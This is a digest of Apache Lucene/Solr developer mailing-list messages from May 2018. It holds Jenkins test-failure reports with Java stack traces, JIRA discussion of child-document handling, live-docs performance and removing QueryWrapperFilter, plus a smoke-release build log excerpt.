[JENKINS] Lucene-Solr-BadApples-Tests-master - Build # 61 - Still Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-BadApples-Tests-master/61/

4 tests failed.
FAILED:  
org.apache.solr.cloud.autoscaling.sim.TestGenericDistributedQueue.testDistributedQueue

Error Message:
Test abandoned because suite timeout was reached.

Stack Trace:
java.lang.Exception: Test abandoned because suite timeout was reached.
at __randomizedtesting.SeedInfo.seed([71E476A51D330AAC]:0)


FAILED:  
junit.framework.TestSuite.org.apache.solr.cloud.autoscaling.sim.TestGenericDistributedQueue

Error Message:
Suite timeout exceeded (>= 720 msec).

Stack Trace:
java.lang.Exception: Suite timeout exceeded (>= 720 msec).
at __randomizedtesting.SeedInfo.seed([71E476A51D330AAC]:0)


FAILED:  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger

Error Message:
waitFor not elapsed but produced an event

Stack Trace:
java.lang.AssertionError: waitFor not elapsed but produced an event
at 
__randomizedtesting.SeedInfo.seed([71E476A51D330AAC:122F402784FC7981]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at org.junit.Assert.assertNull(Assert.java:551)
at 
org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger(IndexSizeTriggerTest.java:180)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
a

[JENKINS-EA] Lucene-Solr-master-Windows (64bit/jdk-11-ea+14) - Build # 7331 - Still Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-master-Windows/7331/
Java: 64bit/jdk-11-ea+14 -XX:+UseCompressedOops -XX:+UseConcMarkSweepGC

7 tests failed.
FAILED:  org.apache.solr.handler.TestReplicationHandler.doTestStressReplication

Error Message:
found:2[index.20180522024118516, index.20180522024120968, index.properties, 
replication.properties, snapshot_metadata]

Stack Trace:
java.lang.AssertionError: found:2[index.20180522024118516, 
index.20180522024120968, index.properties, replication.properties, 
snapshot_metadata]
at 
__randomizedtesting.SeedInfo.seed([91F96B5AE57E8824:4A526B9CE056E197]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at 
org.apache.solr.handler.TestReplicationHandler.checkForSingleIndex(TestReplicationHandler.java:968)
at 
org.apache.solr.handler.TestReplicationHandler.checkForSingleIndex(TestReplicationHandler.java:939)
at 
org.apache.solr.handler.TestReplicationHandler.doTestStressReplication(TestReplicationHandler.java:915)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:566)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLea

[jira] [Commented] (SOLR-12361) Change _childDocuments to Map

2018-05-21 Thread mosh (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12361?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483513#comment-16483513
 ] 

mosh commented on SOLR-12361:
-

[~dsmiley]
Perhaps changing the _childDocuments to Map (maybe a 
name change should be made) could solve our problem gracefully?
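
The shape being proposed can be sketched with plain collections. This is a hypothetical illustration, not Solr's actual API: `Doc` is a stand-in for SolrInputDocument, and the relationship-keyed map replaces the current flat `_childDocuments` list.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

public class ChildDocMapSketch {
    // Stand-in for SolrInputDocument, reduced to what the sketch needs.
    static class Doc {
        final Map<String, Object> fields = new HashMap<>();
        // Proposed shape: Map<relationshipName, List<childDoc>> instead of an
        // anonymous List<SolrInputDocument> _childDocuments.
        final Map<String, List<Doc>> childDocuments = new HashMap<>();

        void addChild(String relationship, Doc child) {
            childDocuments.computeIfAbsent(relationship, k -> new ArrayList<>()).add(child);
        }
    }

    static Doc buildExample() {
        Doc parent = new Doc();
        parent.fields.put("id", "book-1");
        Doc review = new Doc();
        review.fields.put("id", "review-1");
        parent.addChild("reviews", review);  // the map key names the relationship
        return parent;
    }

    public static void main(String[] args) {
        Doc parent = buildExample();
        System.out.println(parent.childDocuments.keySet());  // prints [reviews]
    }
}
```

The point of the map key is that the parent/child link gets a name ("reviews" here), which the current flat list cannot express.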

> Change _childDocuments to Map
> -
>
> Key: SOLR-12361
> URL: https://issues.apache.org/jira/browse/SOLR-12361
> Project: Solr
>  Issue Type: Sub-task
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: mosh
>Priority: Major
> Attachments: SOLR-12361.patch, SOLR-12361.patch
>
>  Time Spent: 20m
>  Remaining Estimate: 0h
>
> During the discussion on SOLR-12298, there was a proposal to change 
> _childDocuments in SolrDocumentBase to a Map, to incorporate the relationship 
> between the parent and its child documents.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12366) Avoid SlowAtomicReader.getLiveDocs -- it's slow

2018-05-21 Thread David Smiley (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12366?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483501#comment-16483501
 ] 

David Smiley commented on SOLR-12366:
-

Updated the patch:
* replaced the implementation of SolrIndexSearcher.getFirstMatch to be in terms 
of lookupId -- less to maintain and one fewer reference to the 
SlowCompositeReader (field "filterReader").  Slightly faster probably.
* simplified getLiveDocsBits further
* renamed getLiveDocs to getLiveDocSet (thus changed a bunch of other files) 
but kept the original and marked deprecated, to be removed in 8.0
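
The rename-with-deprecation step described above follows the usual pattern: the old name becomes a pure delegate so existing callers keep compiling until 8.0. A minimal sketch, with a stand-in `BitDocSet` rather than Solr's real class:

```java
public class SearcherRenameSketch {
    static class BitDocSet { }  // stand-in for o.a.s.search.BitDocSet

    static class Searcher {
        private final BitDocSet liveDocs = new BitDocSet();

        /** New name. */
        public BitDocSet getLiveDocSet() {
            return liveDocs;
        }

        /** @deprecated use {@link #getLiveDocSet()}; to be removed in 8.0. */
        @Deprecated
        public BitDocSet getLiveDocs() {
            return getLiveDocSet();  // pure delegation, no second code path
        }
    }

    public static void main(String[] args) {
        Searcher s = new Searcher();
        // Old and new entry points return the same object.
        System.out.println(s.getLiveDocs() == s.getLiveDocSet());  // prints true
    }
}
```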

> Avoid SlowAtomicReader.getLiveDocs -- it's slow
> ---
>
> Key: SOLR-12366
> URL: https://issues.apache.org/jira/browse/SOLR-12366
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: search
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Attachments: SOLR-12366.patch, SOLR-12366.patch, SOLR-12366.patch, 
> SOLR-12366.patch
>
>
> SlowAtomicReader is of course slow, and its getLiveDocs (based on MultiBits) 
> is slow as it uses a binary search for each lookup.  There are various places 
> in Solr that use SolrIndexSearcher.getSlowAtomicReader and then get the 
> liveDocs.  Most of these places ought to work with SolrIndexSearcher's 
> getLiveDocs method.






[JENKINS] Lucene-Solr-BadApples-7.x-Linux (32bit/jdk1.8.0_172) - Build # 40 - Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-BadApples-7.x-Linux/40/
Java: 32bit/jdk1.8.0_172 -client -XX:+UseSerialGC

3 tests failed.
FAILED:  org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState

Error Message:
Did not expect the processor to fire on first run! event={   
"id":"85f77e799a7cT5ie8lom3mjd3ww5uoe2g0wczf",   "source":"node_added_trigger", 
  "eventTime":147298025314940,   "eventType":"NODEADDED",   "properties":{ 
"eventTimes":[147298025314940], "nodeNames":["127.0.0.1:37613_solr"]}}

Stack Trace:
java.lang.AssertionError: Did not expect the processor to fire on first run! 
event={
  "id":"85f77e799a7cT5ie8lom3mjd3ww5uoe2g0wczf",
  "source":"node_added_trigger",
  "eventTime":147298025314940,
  "eventType":"NODEADDED",
  "properties":{
"eventTimes":[147298025314940],
"nodeNames":["127.0.0.1:37613_solr"]}}
at 
__randomizedtesting.SeedInfo.seed([2CCD1E2AB6A7F4A1:E263BAB94E9E8CB7]:0)
at org.junit.Assert.fail(Assert.java:93)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.lambda$new$0(NodeAddedTriggerTest.java:49)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTrigger.run(NodeAddedTrigger.java:161)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState(NodeAddedTriggerTest.java:257)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIg

[jira] [Updated] (SOLR-12383) Add solr child documents as values inside SolrInputField

2018-05-21 Thread mosh (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12383?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

mosh updated SOLR-12383:

Description: 
During the discussion on SOLR-12298, there was a proposal to remove 
_childDocuments, and incorporate the relationship between the parent and its 
child documents, by holding the child documents inside a solrInputField, inside 
of the document.
{quote}What if a SolrInputDocument was simply a supported value inside 
SolrInputField?
{quote}

  was:
During the discussion on SOLR-12298, there was a proposal to remove 
_childDocuments, and incorporate the relationship between the parent and its 
child documents, by holding the child documents inside a solrInputField, inside 
of the document.




> Add solr child documents as values inside SolrInputField
> 
>
> Key: SOLR-12383
> URL: https://issues.apache.org/jira/browse/SOLR-12383
> Project: Solr
>  Issue Type: Sub-task
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: mosh
>Priority: Major
>
> During the discussion on SOLR-12298, there was a proposal to remove 
> _childDocuments, and incorporate the relationship between the parent and its 
> child documents, by holding the child documents inside a solrInputField, 
> inside of the document.
> {quote}What if a SolrInputDocument was simply a supported value inside 
> SolrInputField?
> {quote}






[jira] [Created] (SOLR-12383) Add solr child documents as values inside SolrInputField

2018-05-21 Thread mosh (JIRA)
mosh created SOLR-12383:
---

 Summary: Add solr child documents as values inside SolrInputField
 Key: SOLR-12383
 URL: https://issues.apache.org/jira/browse/SOLR-12383
 Project: Solr
  Issue Type: Sub-task
  Security Level: Public (Default Security Level. Issues are Public)
Reporter: mosh


During the discussion on SOLR-12298, there was a proposal to remove 
_childDocuments, and incorporate the relationship between the parent and its 
child documents, by holding the child documents inside a solrInputField, inside 
of the document.
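
The "child document as a field value" idea can be sketched the same way. This is hypothetical, with stand-in types; Solr's real SolrInputField does not (yet) support document values:

```java
import java.util.HashMap;
import java.util.Map;

public class NestedFieldSketch {
    // Stand-in for SolrInputDocument; field values are plain Objects,
    // so a Doc can itself be a value.
    static class Doc {
        final Map<String, Object> fields = new HashMap<>();
    }

    static Doc buildExample() {
        Doc parent = new Doc();
        parent.fields.put("id", "post-1");
        Doc comment = new Doc();
        comment.fields.put("id", "comment-1");
        // The child lives in an ordinary field, so the field name itself
        // ("comments") carries the parent/child relationship.
        parent.fields.put("comments", comment);
        return parent;
    }

    public static void main(String[] args) {
        Doc parent = buildExample();
        System.out.println(parent.fields.get("comments") instanceof Doc);  // prints true
    }
}
```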








[jira] [Updated] (SOLR-12366) Avoid SlowAtomicReader.getLiveDocs -- it's slow

2018-05-21 Thread David Smiley (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12366?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

David Smiley updated SOLR-12366:

Attachment: SOLR-12366.patch

> Avoid SlowAtomicReader.getLiveDocs -- it's slow
> ---
>
> Key: SOLR-12366
> URL: https://issues.apache.org/jira/browse/SOLR-12366
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: search
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Attachments: SOLR-12366.patch, SOLR-12366.patch, SOLR-12366.patch, 
> SOLR-12366.patch
>
>
> SlowAtomicReader is of course slow, and its getLiveDocs (based on MultiBits) 
> is slow as it uses a binary search for each lookup.  There are various places 
> in Solr that use SolrIndexSearcher.getSlowAtomicReader and then get the 
> liveDocs.  Most of these places ought to work with SolrIndexSearcher's 
> getLiveDocs method.






[jira] [Commented] (SOLR-12337) Remove QueryWrapperFilter

2018-05-21 Thread David Smiley (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12337?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483445#comment-16483445
 ] 

David Smiley commented on SOLR-12337:
-

In this updated patch, I further removed QueryWrapperFilter and its test.  The 
only remaining use of the class was in AbstractAnalyticsFieldTest (analytics 
contrib, tests) which was a very unnecessary use of Filters to simply know 
which docs were live (not deleted).
I don't see a need to leave QWF in 7x; Filters _are_ Queries.
I plan to commit tomorrow.
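
The overhead mentioned in the issue description comes from a throwaway searcher whose query cache is left enabled: it pays cache bookkeeping for queries it will only ever run once. A self-contained sketch with stand-in types (in Lucene itself the equivalent fix is IndexSearcher.setQueryCache(null)):

```java
import java.util.HashMap;
import java.util.Map;

public class TempSearcherSketch {
    static class Searcher {
        Map<String, Object> queryCache = new HashMap<>();  // caching on by default

        void setQueryCache(Map<String, Object> cache) {
            this.queryCache = cache;  // null disables caching entirely
        }

        void search(String query) {
            if (queryCache != null) {
                // Bookkeeping that a one-shot searcher never benefits from.
                queryCache.put(query, new Object());
            }
        }
    }

    static Searcher oneShot() {
        Searcher s = new Searcher();
        s.setQueryCache(null);  // the step QueryWrapperFilter forgot
        return s;
    }

    public static void main(String[] args) {
        Searcher s = oneShot();
        s.search("q");
        System.out.println(s.queryCache == null);  // prints true
    }
}
```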

> Remove QueryWrapperFilter
> -
>
> Key: SOLR-12337
> URL: https://issues.apache.org/jira/browse/SOLR-12337
> Project: Solr
>  Issue Type: Sub-task
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Fix For: 7.4
>
> Attachments: SOLR-12337.patch, SOLR-12337.patch
>
>
> QueryWrapperFilter has not been needed ever since Filter was changed to 
> extend Query -- LUCENE-1518.  It was retained because there was at least one 
> place in Lucene that had a Filter/Query distinction, but it was forgotten 
> when Filter moved to Solr.  It contains some code that creates a temporary 
> IndexSearcher but forgets to null out the cache on it, and so 
> QueryWrapperFilter can add non-trivial overhead.  We should simply remove it 
> altogether.






[jira] [Assigned] (SOLR-12247) NodeAddedTriggerTest.testRestoreState() failure: Did not expect the processor to fire on first run!

2018-05-21 Thread Cao Manh Dat (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12247?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Cao Manh Dat reassigned SOLR-12247:
---

Assignee: Cao Manh Dat

> NodeAddedTriggerTest.testRestoreState() failure: Did not expect the processor 
> to fire on first run!
> ---
>
> Key: SOLR-12247
> URL: https://issues.apache.org/jira/browse/SOLR-12247
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: AutoScaling, Tests
>Reporter: Steve Rowe
>Assignee: Cao Manh Dat
>Priority: Major
>
> 100% reproducing seed from 
> [https://builds.apache.org/job/Lucene-Solr-SmokeRelease-7.x/203/]:
> {noformat}
> Checking out Revision 1b5690203de6d529f1eda671f84d710abd561bea 
> (refs/remotes/origin/branch_7x)
> [...]
>[smoker][junit4]   2> NOTE: reproduce with: ant test  
> -Dtestcase=NodeAddedTriggerTest -Dtests.method=testRestoreState 
> -Dtests.seed=B9D447011147FCB6 -Dtests.multiplier=2 -Dtests.locale=fr-BE 
> -Dtests.timezone=MIT -Dtests.asserts=true -Dtests.file.encoding=UTF-8
>[smoker][junit4] FAILURE 3.38s J2 | 
> NodeAddedTriggerTest.testRestoreState <<<
>[smoker][junit4]> Throwable #1: java.lang.AssertionError: Did not 
> expect the processor to fire on first run! event={
>[smoker][junit4]>   
> "id":"16bf1f58bda2d8Ta3xzeiz95jejbcrchofogpdj2",
>[smoker][junit4]>   "source":"node_added_trigger",
>[smoker][junit4]>   "eventTime":6402590841348824,
>[smoker][junit4]>   "eventType":"NODEADDED",
>[smoker][junit4]>   "properties":{
>[smoker][junit4]> "eventTimes":[6402590841348824],
>[smoker][junit4]> "nodeNames":["127.0.0.1:40637_solr"]}}
>[smoker][junit4]>  at 
> __randomizedtesting.SeedInfo.seed([B9D447011147FCB6:777AE392E97E84A0]:0)
>[smoker][junit4]>  at 
> org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.lambda$new$0(NodeAddedTriggerTest.java:49)
>[smoker][junit4]>  at 
> org.apache.solr.cloud.autoscaling.NodeAddedTrigger.run(NodeAddedTrigger.java:161)
>[smoker][junit4]>  at 
> org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState(NodeAddedTriggerTest.java:257)
>[smoker][junit4]>  at java.lang.Thread.run(Thread.java:748)
> [...]
>[smoker][junit4]   2> NOTE: test params are: 
> codec=Asserting(Lucene70), sim=RandomSimilarity(queryNorm=true): {}, 
> locale=fr-BE, timezone=MIT
>[smoker][junit4]   2> NOTE: Linux 4.4.0-112-generic amd64/Oracle 
> Corporation 1.8.0_152 (64-bit)/cpus=4,threads=1,free=70702960,total=428867584
> {noformat}






Re: [JENKINS] Lucene-Solr-SmokeRelease-master - Build # 1029 - Still Failing

2018-05-21 Thread Chris Hostetter

   [smoker]   confirm all releases have coverage in TestBackwardsCompatibility
   [smoker] find all past Lucene releases...
   [smoker] run TestBackwardsCompatibility..
   [smoker] Releases that don't seem to be tested:
   [smoker]   6.6.4





On Tue, 22 May 2018, Apache Jenkins Server wrote:

: Date: Tue, 22 May 2018 02:29:28 + (UTC)
: From: Apache Jenkins Server 
: Reply-To: dev@lucene.apache.org
: To: dev@lucene.apache.org
: Subject: [JENKINS] Lucene-Solr-SmokeRelease-master - Build # 1029 - Still
: Failing
: 
: Build: https://builds.apache.org/job/Lucene-Solr-SmokeRelease-master/1029/
: 
: No tests ran.
: 
: Build Log:
: [...truncated 24174 lines...]
: [asciidoctor:convert] asciidoctor: ERROR: about-this-guide.adoc: line 1: 
invalid part, must have at least one section (e.g., chapter, appendix, etc.)
: [asciidoctor:convert] asciidoctor: ERROR: solr-glossary.adoc: line 1: invalid 
part, must have at least one section (e.g., chapter, appendix, etc.)
:  [java] Processed 2212 links (1766 relative) to 3083 anchors in 245 files
:  [echo] Validated Links & Anchors via: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr-ref-guide/bare-bones-html/
: 
: -dist-changes:
:  [copy] Copying 4 files to 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/changes
: 
: -dist-keys:
:   [get] Getting: http://home.apache.org/keys/group/lucene.asc
:   [get] To: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/KEYS
: 
: package:
: 
: -unpack-solr-tgz:
: 
